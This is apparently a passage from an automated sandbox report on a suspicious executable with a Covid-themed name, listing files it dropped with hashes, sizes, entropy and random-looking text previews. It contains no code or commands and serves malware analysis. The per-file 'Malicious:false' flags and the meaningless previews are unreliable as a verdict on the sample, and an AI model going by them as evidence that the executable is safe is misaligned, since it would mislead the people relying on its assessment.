                                          SHA-256:DD624C949CF52DDA01559D8042B87B3472849D687AC6ECD3317E53A3187CAB81
                                          SHA-512:FEDF3DD6C3E9AEF361C3BED76FA1601C53C39CBECADA4D949D762CC267AD33904CF0CCA3FFDEA014FE145098A4A1FE2B963AB1062C22DE4E25A82488C1884412
                                          Malicious:false
                                          Preview: HTkMzLUSqjNv92NW181L967Zx7QXZzK8XZMtY99N854517U8YF5LP3GaO12640d21G3alb770S9tbJ4buw2SO0Y2g..5223tn8x9x077F97n4609cvS4kr49969limNKk3z17s40mi33R6hKR2736CS881X..bmqKe5PL900f9511869V43d7884dJo2FPd76IdGWlQkbY561y44629d2T7142296e1L7996r887..JtGkSFHfw65Zws180P434uCc1394GPr21IGy792O62aj5Kc66TNw0..772F3kb98J1999M3s3106U5N3qX4Eh0q90XT0e986R4J5uxg4M25cM1Or930Ig2v9EF13k0v1VHa365p2L697EB0i07k0YC68BT34..Plt232C..Yy8TQ5390R7P3w3tD9xOr5RrS7u28375HsjzZd0r00045ftqsYa95N8w875786wpLc4L67PM4n5484CwU245Ly8dRm799..Rh02our5226qk94a5ti7FXQO3w0HtA870ed44Km5gobU2IoChW2..
                                          C:\84086963\mgbpw.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):511
                                          Entropy (8bit):5.432216359805171
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:38449361C530C346CADF8C2082689CDC
                                          SHA1:4C6BDD97449299DAFAA6CBD0C6DDB46733E05EE2
                                          SHA-256:9D4D1538D1BD993485043A251C9BCE9F2E8C38C35C5744429234E2567DE8D0F2
                                          SHA-512:7792DE8E71D0455B5F1E11E768D7D949519AF75E84122A27FFEF046CAFD2F775F2DEB670A5575F522A38E6A491BECC622FF6D1A63F2E4578F2FEF0323B43A54F
                                          Malicious:false
                                          Preview: NI2c1q14eGKD966NeDF9206t1I4UR01gqD70G21084l82DTI0Rf0H823L2m5s8647ZYQ09G0831g9..9a3654X2i9WQa07350hAxLr1C595J89..Ok38Lv3N0y67h28L03gX5hwuCTtEm18p93fr1q5ttselrmn0jz4fw4t9083YpS305s1acI830675rOJ984b26eEGI..S0aF87jkDTG383nfgXlM207a4499v..91I07JqrJ5P..w5C364y242ZS8084tY0T7Gv58F363Qr956n4Uf21z549612802IbAaY758Qh76R28vSd6966h5Ehbt7lp5c77YG096L1g016fb1eJ6hF0too298u0i3Y8723..AfU825aoualeOKh5c90Ti371J56e0Lim7877I7000y3bKdq571847c5525n0cL35C7S55MIf6ss65Rp186jn6kG290915..7KxcR42f..Fgp4y4Qw7DD77MmTU898g87xA014542uEZ7..
                                          C:\84086963\mjxanpqa.ico
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):530
                                          Entropy (8bit):5.50010539956505
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5D9F1E143A2D39BA6259C368391A2D6F
                                          SHA1:51E68AA403FBCDAC9F3300C5D4B3704A62E7618A
                                          SHA-256:B7E181B1F0F0646731A5DA28E73237AA702F61EF85F7EEACC6B6ED8D9E9FED75
                                          SHA-512:76A9F423A21DF16764481A4AC0FC39934E925B548F964060910DD96E87FDBFF8091FB40B9629A15CBCDF8BED8086E586C0185A5619A957D949C4B38A5E4ED1B0
                                          Malicious:false
                                          Preview: 83580381034Ed8Ma0497gHRx2Yp0O0Pr8777M63I3536c96431l6AI391423rp77p9q1M5zC6O4cF019L11On498B55Y..4oQ0234j9RxpfdeotnqC8V612v402Fohko06eL21c960TA..Rj0b063k5780ZA9U47vQ72H6U7zv1SR2H1kKZ7u16089m14z8V18C83OVHm688181Kk71l7318Wuy8rI1K1G763634UDyCGxV194Kh06Kg3h7i23qtV69dAjxK5Ao3UYJfz912k61Yi5gr96o5K65jic0..i796j7t2Mr68d2C3228j5A12W..YhUuD7LZWK4Lnm079c10KjB35vr4zWkH72GvQE5O105y6N1ow44RO7829A3S9u29DL328E8gOY12gEbF640fe3Lv3ihs9p380l87B4JOY7437kXW..d2SlwFZ5h8wHIuP6Pyb886J9o5Vo952y475lOn0949glE29zj8642C1CgR24JzqT4W9wQT0501Lw9lkq5Z6d5C5pPa..
                                          C:\84086963\mmaihjbaf.ppt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):506
                                          Entropy (8bit):5.490009992764989
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6DF6F66071BCF1ABA880786F52C38116
                                          SHA1:56CE4D71D7F99906CDFE31AC57D07CA0B5AE9244
                                          SHA-256:4D59E342145B37DA948DEAE6EFB005B7DB97A790ECF8DD3C1B68C2634A727049
                                          SHA-512:599F99DB21E1A1D24C021F7B2E7F80C08170D27920809DA3C906E704996A942435AFE05F4790B318876812209C81F9390F35E30EC80209ECB4064A251B214004
                                          Malicious:false
                                          Preview: 4gC5055Q1dHtkzs6Dr2xz8at2..cy0q02T8clEgQ352oPi95979Oe16D75Wzsi9..53Z5R9JVY465bR1y30ghFp850Wy54oD5Zj82h7FH092zWSVys252dq4W29SG48LWaB..9rn6J6i8u9x64e51247184a83gl535Z4..632Vo2Uk0r928tBl9r4s5Y97QO009P79awF..t55PcEL6mJ61..910TvmIDs9Bs67y98Oy0444813K4IWlj..HJ42jp5Vq3G5hQ09yjKR94..67S183L6IP5rNs1X347256GmvaP26h51232Fz264T9IPM9b5099R6d7LP3R..82XRV1nD3i5A9l28f95Ti7s6bcO2e6R596d7e4dXe301SxR7W82M8248gO31jT711c941MS21i790359Pr8TDMm82jcK496636L88j695JhW2E3xhq99nbBW2TXL2KH11SjRVcCtP0aialq71..5DciS430H66Jm80f7QAd..
                                          C:\84086963\nbwuai.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):516
                                          Entropy (8bit):5.443127175988351
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:18AD63B82339D36CD20DB61EF95C5E14
                                          SHA1:CE74170411F52FADD880816FFF10097BB9D1FDAF
                                          SHA-256:46FA400C83A7B6B02F34827EE4F25791EE9545D3086159EDB9468F33848FD2E4
                                          SHA-512:BBFD0F8009307E555223373B6F44A47114C827F6BE20915C066600BD6ED3E2E94D5F27DFAEDC84FBCAE84EE68130A2FBB72991C75C48EA9A54967C72F6A5D475
                                          Malicious:false
                                          Preview: 4R5d6Cv1sj7hFo9733K854f6I6566..4973373AOjY7zXAmtzFDL4h4zhQ0uCR4T770v4..F00fsh6w987Pl397fV92uP60OWUZ162d2ofAg6i6K705o9j5r934t726X81660o43O33R3qzU9y5UNz03..8FmBU3kTo3115gaU8tAG43PxMB2584594H1jFr5xc9ie2225n17217GH72824k..Wq2846remv1e358053o77X2z4LJ0F0o63UG6d25Lt7RF0vv38ij1RNsUJx5T112E9W7eQ2987g8Md06b94mC..3gXv42nBvETf640126XbozD688F3h4PCsZ24P936549HX12dHO99p50..4Eu9535670q4q08P0j6kx5A86l5eQ1Q8vu8gA6Y84U14019R3OU448iM40An9a42iV7D1c877nZb..113iaq9qvBJ9G..889On651793671j022557eN6kbeweD2s5x3Z0032YST29GGnJq1Y6C8156Gp..
                                          C:\84086963\ndctgkwvr.ppt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):537
                                          Entropy (8bit):5.420059389876511
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6FA5867ABFACB30F8669414894D7F8F5
                                          SHA1:83104376EA580707E38D29AE206A3908E3C2D02A
                                          SHA-256:32C21933839D9B77BDE59525C9F4B5A35E55C389CDB9A07C9D400D9212478E0A
                                          SHA-512:A140D70B0E593418C9BE3DA665C33B5844333AAB2676F4747E5A883E4A3EBA7F088A11041A4FF2D68EBFEA4240A8103033F3E61DCA09F82781B9228A46B95948
                                          Malicious:false
                                          Preview: x9q3j9S14..2lc3C97atdzX67737103w20F38S42mG97O73771I5i4ys4p748iW68a0foEM60AqLuoaH3R87U5o46Jda7B240..3079nPttalE4EH5S53O4luKg2317GJzOxP..c5R8k713omO3I2e7LTp3HnN9Wm757YqFbv..qB34S4800004zt1203iWp6208lhriva75aXOS25690s67014Q169R118mF51U1QU24k2N4MZ46r276JU95s72Efh2q6E777h31W71..T47Q6uP813PK0175be373F1pDR2I66aKl8F73IY3tg3en8406uplC6ep5K8pRJ780Owv4O76f80rZY94B..oKW7f30bN7122qL27WMlVV0p9nVII0H278SJn8666s184F7672aODh5106536in6PFJFn673LRO6y2Y695759p6..na2Z1yj48451I07iG30LyS5y987M1YAw36726d5c165b8uO16OO084l953z0n49408o1R3300Vhb36x59z0uBh9Sn..
                                          C:\84086963\nhatsaem.ini
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):568
                                          Entropy (8bit):5.544308795182827
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FEFAE78A159DA68B06E944743082580E
                                          SHA1:5C23A616BC39853A630422DA943DFD0E07013C8C
                                          SHA-256:BBC62A56930ED6E1717D4AA038E4FFD580FA7A7B32833185C7922B06F0320574
                                          SHA-512:62658C501A9FD66C5281844C24042996AC452D013835BA907A3C674B8C4478B410B1F2E71FB9A9462F4F5ABC09BBAC01CBAB6E19341429D2C44891FD471E8F04
                                          Malicious:false
                                          Preview: Z21rUF55d20r44576HR91s51180WKz9IMa09SOx0Y3du3Z5qq6UroA4V4Y0YS643d02wg3Kv8176aI1XRi8u79p4G02dRrmiD869914vj235h576C182A6q1Z6tLno0UrmSAD..x94Ap9aE1n9ns5s2VS55dEGg52mIk74kr8zb34iv1wiQ24pzwyM324Z9zOYdP9i..O0k8q44..h6c4Fk5t7C3Y74i3fsF0q603dJ20Unuqx89H63nIZI7B555327l71I045Cu306m36wgCcQT69nS8rWV1D432C53yG61uG9cZX89I8898SK3D0p93x426j4B9u59vS7Xj15fh04V8..I7274v7Vh14e9m0N7bNSN291zDzwF5y643S..3o5g25nncv698DA7Jv..7rB3dU1Y3N90N1P2kf445rbFZ689D8a..aTsZ1G48Jg90F5e4d8Tzc7o9T7wy0LZAOK241t..6jjpTB2GR30k9p47u49mf7f6631J3b3b34928T6etU8lQ8i01CU6V16zw6a63Wz81S0340r4IJa567Y1toS203Q95..
                                          C:\84086963\nkcutginn.icm
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):522
                                          Entropy (8bit):5.549320494372432
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:21BF01371567E54A638E86CDBAEDE926
                                          SHA1:DD17559E1894ED08FAA372BB131AA5A5827D923D
                                          SHA-256:FC319107B16B8D6BE70291966B796BB4C64C37354B5E48C19E0E3E429F216D45
                                          SHA-512:9F8DE3773E7D515A347D06728DDABF84178857770D3346D48636C2115AAAEF6C4B0068C9582D61A39AF3E5F860E5F0DE73AAD5A668E2E0B5FA16030E23B9EA91
                                          Malicious:false
                                          Preview: 29S5iN722033ZQ6Ch0s2ZwRM1kZ9OnAFmFHk036wg36A646494rzm583m690W867IwRoR0RY45Z91h957Tn727VDb0..9OyZ4x5A17kFj4wp3tp4ft976NemBZ0D7WYp8bj3s3o78u0i4C1Spx1n68kTqB096j8M3r8a680729859n2AwWwku94sxJdjh1x2yq9pHuB35e652176z7mhw0K194866tC40Q21b84tKLd5teV2kFR2812h3io5Rn8nQIVav404v3wO7Y7c..708h06o7g3Aal9i943lgAvyOzLx0Q5QY1p58335Bg1nDEO6BZC7QNAF408V8c24Wl16QQ21iwjS1Z..Azu6hX1D6z9uH0t5G05F0Z23UUyzrKBd5M4jXVc7I25R14h1KsD3M2jK6axmP4vb4w8jjI718168k4u0ekB6h846z5biWb06MZd7Y15i8528LgCiF6C626I0tV4x66A75e2q53121a5NI6f6P123wHyhW8a2One4oq0p085..
                                          C:\84086963\nuhwt.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):535
                                          Entropy (8bit):5.528314857368201
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7836CFD1B9AA255A90E290D8B78DEC31
                                          SHA1:1B0B57AD243F6A2D0DA0214F4D8E525E5EBC739B
                                          SHA-256:C7DA0C2C0A738D64D5D28B6FE30E2214FFABE0129D261B83DFE8EAB235B49082
                                          SHA-512:75486430ADB140DB65E667E9A626A89843DB65457FE7AE7DCC5D9B0AF5AB6CDCF969A2D1D16297769DF0AFABF53E600CE3DDAC45CFE51E87A4671DFEFCE45AB7
                                          Malicious:false
                                          Preview: 96iRv0Mz30BCz6kJ08INCW05KN92696Nt91UQU0i72769H6Ft8CjdFKx10JpD7t7FI7I87V513e4u6Mj98ZD89p39Xm2m67PTr8Q3b1Ar7CmXw648Wu4o9W215YYrl36S3R9bi979G188344gYBE0i..727qwe0722440h5f2d1s5239E30Ei9p231nyeh2204493dG5W8..Qm29OPRx0068uLq9416lLc27u00IlV5212o821O9n892Tzw292lPn72M8q..tCCR8..N3bxOc8d8995ZR42p3ZkB30DN0EHL9Kc3k8uBR61SO3gU2339h1Bm050510DTfr44j..IP69F051hCN35283K76Gcnaz2T094Go771NWB8V0q6ETepXq8pt9kZWxnscyq40WlHPv410hkrmWO7dx6W4aw77x31390m760..g614784c8Xz4w7iJ..JC91D52x750nra3aw8mzj180gRW4m2Xi3N2y..d47Yxu7nPoK2341P3qdA3033kq622jU491kRZ2G..
                                          C:\84086963\odsgpb.xml
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):671
                                          Entropy (8bit):5.505720771474401
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E9DC79C25308CEF856EF4D3AB1EB8885
                                          SHA1:4DC4D904374E1C6CC616DAFCB0879569AEA06A75
                                          SHA-256:D649739031D04918B09E43A0005636AFE4550E34E97D8DC057975FEE75AA40CC
                                          SHA-512:7BC8843221F338BABB9C76C4B5302664EAB86AE6F08172D921DC9DE65F3E93707D4AD22A56E31D160B3F47264BAC963ABE28BA03BDD440FDD6C405CFA8C2D52D
                                          Malicious:false
                                          Preview: L2mj9555Pck6j9MgctG7AMI81TJJtj3T8Hn8fBSbbF1xb40F2o6Y8Q6Pq03744a3A9A246667423w8395je726oD53HyBF2N2Zr3cCHr0882Pv01QG0RM1w04an8h3900107s1sP2Yy6Yh5GGS7r25udJ9u670Wj3RkF6QP..my834295D7A260f9SCZa9G..78EJ29N3I58019456Ik6IR42n159T1CuX15C0ki5q40EZ537x17S62Az76rC9j2ph..N9550E49gfG5j4ag3l794OyO14Sp3Vv74E94374r6mQ771U1OSz74TsQsq0r9FkA39d..9IP91m5H9Et62vW8i9WGkAkj3da2850iKQZz8C7p48mduxc7YuEt2PX66al67022H4W49gYc59Z390x1H2M32t098t084Q071LS0Br3h51J0o496Q40D56uc3024HJg5854DUg8UFkE1091..83J22VPG8ody73xObS8iWB974695CRw29x4W9xVG8W1723y43b8Of23a0D1VOk7hEu0C17b33e9819298V3s5I5CIP95225K25k4cG31xb04Q3WDaTnX1z7B370x8j88b8w2020H511bPUVM5Qubsp6138iHG7QV0x645CTKe50L4VTahXNc89R1vb0s18DV1TH..
                                          C:\84086963\onhdxftk.txt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):557
                                          Entropy (8bit):5.525598843935324
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2F14798CE79B63741C105A9666767F77
                                          SHA1:9E32729025EA0F5C3AF63E7C0AB500FFC21F86ED
                                          SHA-256:2B63F693728DDF990EB6AC25EDE8ED5451CBBB04B685FB05CBE3287DB76EBA35
                                          SHA-512:661C44AE98FA0A2EBB2580DFD70109848D7EF57B4B84E3353BDB69818796ECA0A36A8FB7920A7470C058A1E95EA6E843E408372A6E3187C28CB9C02FD6C9F96A
                                          Malicious:false
                                          Preview: 0MFseLn2bWz8EuN1b38UWnQ8we8S7eWpJ1n43BOC8465WZj0T11F36rjpRYs000iZ92Mm5068s7943l6J44475W96CB3Y17U7z0UR72Q..5e580905bo68eaa7HXdeMO3v42Z46A790ax19e0I2P13ph111pCJ4YKO3M8750rgwt24qJ0sh6d5Jr1KYw782zY34T72G6..4eaJM1B35H1VT77159XGy73h1455r989wp0n82TE7TC89i9a58n49IC4L4..r3Kn560RAV9dnEF3M2zSC9ZxKisU6t50413B61OX45ZGmji8r48d1E4q6t55g0K65n1jy73l35OPm2qcLG5qP3zB43V2qXh1NU7064XE93g9l53De5j68zdVgi6I6S3CH6699w4KByHp95R..4C2N63Af0q2416TDc8fHZa6a9eBCI04qrIHmZ3dh..8Pvk62e74cHA4gr76EcPs4123lG86lFE..p16oXDW41523zE4r543O7ChYO17nKx4Rn9W5H5BOG89371r4w93148T9890Z9tq59j95D373..
                                          C:\84086963\onnw.bin
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):507
                                          Entropy (8bit):5.524600536989471
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:15F78D300ECFFBA88FBFC6F1DF7FD5F9
                                          SHA1:F176F2F7F83D29D72FC2BB2CEDED90D084DF86F0
                                          SHA-256:DD7A54FADD296322781F4FE6B48581FAF83434731565EC368AC53A087A7181AC
                                          SHA-512:4FA75CF98019D0AC51698BB0496A968CA16FE8ADBAF8ED8B4A222CF014C81F7D2F2A119107379B40923CC04485161B55F6D6CC11569CE8C51F409AAAA5E4C8E5
                                          Malicious:false
                                          Preview: iqfX2mU941k119p1Euq00z4k90iKKtEh4XL998gX55i1Z01768K5Z9vG48394E2yCfej0MsF90C4O8s014Qw76Mh14H2ha632nkx7IeC218Je1921i85bi53TWx8546ut6S0781IR4CUg10DUc643506Bm5v7..cN1y3s3EPR09t2M0CMs23Syml7u6GNT91Hjj19s8ip5B3O5PF9VdUX8Pb3X48S0mgy015BzzhTW0mVn11Y40mv..52UD33d3G2lKA955D69tIWOT7DSFDElD0X7E9n584h3z92FncM22I58S57342G746vsJwv9ndUI0MG..C4t84Dbps361Xf654p04L17fG838..984201boZ52f5Wy..1vVP2VMa7J3D099U91r9V2yk1018PJ3IvTv9749x9wz05skS0140A66Zm4zNdE8cu81s3y75m085d053KuoY367Qq0Q1WGTa7Xjh3VhLUL0142k29B2aT0U51F74793Bk77..
                                          C:\84086963\oqcijplm.dll
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):519
                                          Entropy (8bit):5.495167284436742
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2BD68D8ADB4F64CB59C04F0E272E5BF2
                                          SHA1:3AE6BE3A030AA6F007780F7B1D495B67BE0AC414
                                          SHA-256:C3712B831BED9E8897D7F43E6E310E3E0AC2C1FE8215688E9AC0E6729C8E7641
                                          SHA-512:DD1B1C30ADA20568AEBB4940F89F039CE0A7EE77842272E2E415B8E685237865185FCEAB8F93233B22BC32412132144E9A58E5BE986D443D22183FC628F903FC
                                          Malicious:false
                                          Preview: 97x90ZBE3940kQzf776S6s0f8r77cn2H6o2pOKf4YnM7jYVc2U3tz76Z1tF485PL..91dya6U877QCntPah1013t12y5HlvGRC79X0836kgY4Lf97t1vDFHzeX88m726UE53914e4Nff68N81j80LM9Qzf8t236t0JV38W..WD8jrk31QSHO9YLC9i9lKiQ70290xNaM728bZp1Cn89p2753t0WgXE3u82mA12f2429oJ6fU9q7P5a3pdeFzZF00k6Tby6015pE6oF978Qr757i658yvh9Xq52N19697J7X9J24H4tN43wTh2141v33xSb2IjLuDb501B49U6b6116zv68..ji3e0Bd75aZTm03177q84DHiCk4538u61X..rS01D27V81l8uES84Z58686td4VgN2CQX9j1H8u4HmiB9A295B4890X22zj9aR22k0HN37270Y14R7oZy406WY3n237Lx2sM82o071Y5e1234Y1E7..8vc52kC468MgS31K5l..
                                          C:\84086963\peqltkff.xml
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):618
                                          Entropy (8bit):5.481444804363421
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2603A2188626FE5EC35C4F8B5DFE3D08
                                          SHA1:1F3BC8505D52B2F78CDB37740F80FFAD8C4E3482
                                          SHA-256:C3CBAF8296CA7901EF4F61CFA7514581CC14FCE097E0B8C147436A4471FE844D
                                          SHA-512:2E1C9B6D90BFB7B43A65903606CAD392C3707A8210E4BCE4A2D730123465F19B89A7C26983D7A03BAF64D37B7B490B2256088E47C92541A07F2C73F6D0A82E8B
                                          Malicious:false
                                          Preview: 1C2058mmgl24hSL5J9a6LE8Sqw29571M65FSsOeqKi..7M1r05316h51t5hNIw47B100sGkVDbuYhG9Q2iGdLrZpQ6F53TAe0096J7z5P5..0lSkoK8Qg1n1kX9xL9227VfY7iw334JT14i321z9ynI21Ay8SOX788m90xhN271528qH2Ej8..x5S769gCh1kebeKp8j5BH21J35G9nz9iKlT0g4vD4FB2n0S728V157Nd8cH5Od0K78VFy35t74..cF25cF992p525t5u7642R2H5Ds71ofG99828884p2G2OOX63C3n342TG233g5..2793lp58IZ3Npd1I3U326Q754Kl13i3DT4529yCd84385A51391zj18AL8mJH6rU3G9iL8u797E8884986inzL4o34vb323P9je5r9bY64SL6dyim8u37mO94IU7Uh2a459BO1eU5w1886vt7d1b71w4685z2..ean9n1L2126HiW02ooi88FA6W6l71z3YU0B160ez23183h1852p6snRK1n442s9CBnmi4mYHEjnLI57a80RI9N9m350J6479vP45mHm5319103a1tRX8W80Bw2840BZ3ZZ97It1z..
                                          C:\84086963\pvoppkotp.msc
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):603
                                          Entropy (8bit):5.408265240664928
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:175EAE979DF4EAFD3448007B2FF4EF14
                                          SHA1:C84754CC44FE81A6270FBF43221EC95FB4AB079E
                                          SHA-256:C0DF880E92E8B572DA504AB7647DE507EC29C7C7D46A6B21AD55EEB39DA607A8
                                          SHA-512:5E24E2049C445D7C2C755A66B554A9A1ED359D222D93B1BFC5AED21F5143FFD3D18A7B205AF508CC8B0BFE830414BD99FABE49BF0C07777C7909B53BC5D6B42A
                                          Malicious:false
                                          Preview: N9J6v6765Z59W6fza58jwS3S01j74M2C7..732meJ89u34RV9r3Lf3S4B4v4Rh1P75p5o46TyF891428ZBZ64OeN2Di65N1fC6i12kuFwQcww9D4yC91Z59N2epi0Aq92t5440B4a0JpdZ7M7jmg5Ylx1Z8543825nb625P..I3293a20j65D3Kq1Ow41461hz08221i2U647wFE92Z2E883s29e58g17ko5SW36nrA9R4FrI64O5589EV10z284py2D47CZz5c40t3Z03W84WS..62S4up5w1Pf2jPA8QeD21W8y10cN8jumo3376p6597dr6VhA6jn47p5n20U0Eo8i27586jvL16J6liD749NH4160252122iDlQL1i517W4oSgbO12L04p02s3gv6cJ..t810ow0234UHfs3qmQ79424WF405KY4j6z37n76B700Bj56Cd43d65PScE4W7009V53QL2EuGj63HmDZ..99x47s2652oWo15J3173132j4oU103845wI91oI40kD91b08E56pf4U36G0cu550GNQ9XFg62Wo9H583BDj8328D8ja9JYVP1kp3f66Ek7uWn8..
                                          C:\84086963\qhfoer.ico
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):528
                                          Entropy (8bit):5.399524498098625
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:20302EC29E6C56FCD4C357F07C11FDAB
                                          SHA1:BC1EC3C18922BA99831B24AFFF2E547C634E491E
                                          SHA-256:A6699FFE364F16D3DC17B7C7F278B0A64C8CBC07D0AE92BD7F45630B86C57E70
                                          SHA-512:174BA6EBC04F72B6CDC3AC7F5C9387098120CC4B2C36619D618816FB7E974E632183BCAC98ED0624B4163F164C257F7F289946A9A8A3A51A9AB3D046CBCFCDCA
                                          Malicious:false
                                          Preview: 4KA966O2j8Yu4n9P7z94n8Q20t60y6n3t7o1497Yy..b5R194..4mfP4j9AWGpY7D4O02p15XYy60AF17j9Yo372225893G2plHQ7P621t39J995n1SUJ95tN2R5N1..sPp3oR9cywWbfG4oDVfq0UK430v9v286452g4pr8PxkdfV7421Y97s037izE457pHCz93OdwWs1av41c3119152S26L4L9W418u5hM1Oa221..mO83y5R29T7qdG6jA760WUouq55Ch6VoP4907vb3JEC83S5egbUh161qU3664MK34sz1V565syf2GM49283pz49t48SeBo3HO5422943..7O6654Wlru87734756HRl18s03L337KJ8N4U93SO71tU4T25BJ65oQ59I1z88N839Y7p51Dmwnj7cNq0ZPr8r6A5J7Wm8673d0U..430E16960P2so7P43263e95cONk871to859m32ty70n41JYr00q28T0426iupp3C04w71G020198iE4H5..
                                          C:\84086963\rjcenldrnw.xl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):570
                                          Entropy (8bit):5.454536992205009
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:60812709A0A8B986FFF96A81D389700F
                                          SHA1:2B9A5E2314EB525D8E452E3BACA3C5BB7A5236FB
                                          SHA-256:2F92CEDC1984929611A67E15CFC9F002242F7883D72DB5F820C90B4712224518
                                          SHA-512:22FE6E95636D8198188E86232C7B2657F9045AA24038B985E468889028BFC25DFAB002A4869D842B88929ED092938DC95D652F171381062FB6EDCC63A7D88BA8
                                          Malicious:false
                                          Preview: 9kOHZPv4tF4c14d79VAg43XL0ch44n24G4n91cFs7A173zpfV0u7mii36aK7079z1HKa6713B4Stn13W11726Q7TMJ11W47044mj3l342c..3i112I70bXcf988tTc3olCPS69VWG92y257454UypgvmfS7nPMH7Y5S4x9o67201u8F2OB00gyleISm1V6p1k681V01Xi1D89BLh7SRM1n0NMs0m2150..5D724QQl874en4LHAj23VS378G5d2864x74L474j0H1b48Pq4TM237y4iY5P77mVP7d23A7983R7298zVhHlCm764o6T0P0W44..O9722G6193PA2876SKOg59PaL029u24x5ww9Uzj818DD9eOHW7t9W22r746oF9uo04dhhVe15v916e5qKv7BY21A9K49oyF79Yk4It8kk..A9z7Gq2GpSRrMl034..9D41E7CW2m33O71e32rX4wUN9r701d8131y4nbmw7h54MPrk3537a4Oeom548Z8T7037N0pP8Hgo23iW94C96X92kt285h616p79PL2b22YMz9mam4a2..
                                          C:\84086963\ruqhqaxk.exe
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):602
                                          Entropy (8bit):5.482113858910446
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A845B8E8EE89EF9B7C794835E421C258
                                          SHA1:7182746E72E878BCD9B1211C14F154D0FB021358
                                          SHA-256:FD050DA401C19EBBB052BB7A9D2A0A4150DA13DC0772DA6F79F66739F093894C
                                          SHA-512:AAA557735228E9B770FD2DCF156F4D730597D4211F2575D1F8BD0994F2D4F7B865766BEE4EAAD9BA32976342160A896F2A07454A0C2ECF6D837FB0D14279360D
                                          Malicious:false
                                          Preview: wEgM1861..gi06t2O43aF7dbA890F949MJ292..sx80gOw43oHEtc22S0J3s893Ym0540Sd63D5a390dU1Ps4j5rr487kYG7U94I28RINS2..A9W03590wITd96M18S0s42550w302f7mU19842EPq99b2V9982rkE5F48pH3t4rm75mSwoS2M3k15r0H1NdnZN1SLG1P6e204647156n9X1r1R85vSH7eM0lNBpJqDnBS9X9X80tLU9A1LZf9t9lU3a03P..nKrn3pK..8j2486070q1Ds50g08rA03Qh8Ra44CFNChF9hv..46igT3Q5ODR9w9E462L16N7175100053n2lCe4580Z9yC47GLoU98A90Sx4R1IAwu25MT1oApW11191qwQg5ZU44H9BQ7Y63XJ936..5o04H5033aYZT92K7WphGH8f4x098854wDgNg88K318929Y75kf..R539i8B8Tp02rOE8krRYWUQ0WGD1DN45QQ04h56W94qmZ2LU2ej7UgR99Q31I703981H83y548861161PZR0L6ROY8938N5FmlX4AG242aV2S5CHG125A8vUtA183zuz5k..
                                          C:\84086963\suvq.docx
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):537
                                          Entropy (8bit):5.47997493722099
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3A3EDB6F34422710680E830E8971282A
                                          SHA1:AD36E4CE7DC4485EA060537C4D34633666BF49D2
                                          SHA-256:B7B8AAC83F13AB7CD8836912E6E6E7C8C076D976BB6D945D5347A80B077C40D5
                                          SHA-512:000C4645EE2D895F21A536671884A09250E757D1290829ACDA6DF3E244ADBE82B82A3C19CAA86065465A86F2D4459E6B2CF159AED4E472FCF34977E8D4136BB4
                                          Malicious:false
